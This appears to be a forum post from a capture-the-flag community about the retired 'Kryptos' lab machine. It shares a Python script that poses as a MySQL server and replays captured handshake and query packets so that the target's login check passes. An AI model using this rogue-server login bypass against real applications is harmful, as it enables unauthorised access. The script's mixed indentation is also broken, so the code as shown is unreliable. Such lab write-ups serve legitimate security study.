Use the script as a particular MySQL server to bypass Kryptos login

Off-topic Exploits
, , ,
2

Type your comment> @C136Rick said:

Kryptos retired and I didn’t get user,stuck at the encrypt part.
Thanks for @limbernie & @n1b1ru.I request,both of you response.But I couldn’t solve it eventually.Well,I’m C136Rick,not @0xRick (you know what I mean) :p.
And Thanks @no0ne & @Adamm for making it,I like it.

Here is what I did.Just copied the MySQL response to the program by analyzing captured network data of MySQL using Wireshark.When that request’s parameter(db) was set and done in burp,ran the program and I got 302,which means it worked.

import socket
import logging
logging.basicConfig(level=logging.DEBUG)

if __name__ == '__main__':

    sock = socket.socket()
    sock.bind(("0.0.0.0", 3306))
    sock.listen(5)

    con, addr = sock.accept()
    
	logging.info('Connnect from: %r', addr)
	# Wireshark Info: Server Greeting proto=10 version=5.5.53
	con.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Login Request user=dbuser db=cryptor")
	# Wireshark Info: Response OK
	con.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    con.recv(2048)
	
    logging.info("Wireshark Info: Request Query")
	# Wireshark Info: Response.
	con.sendall("\x01\x00\x00\x01\x02\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x05\x00\x00\x04\xfe\x00\x00\x22\x00\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72\x05\x00\x00\x06\xfe\x00\x00\x22\x00")
    con.recv(2048)
	
	logging.info("Wireshark Info: Request Quit")
	logging.info("done!")
    con.close()

ohhh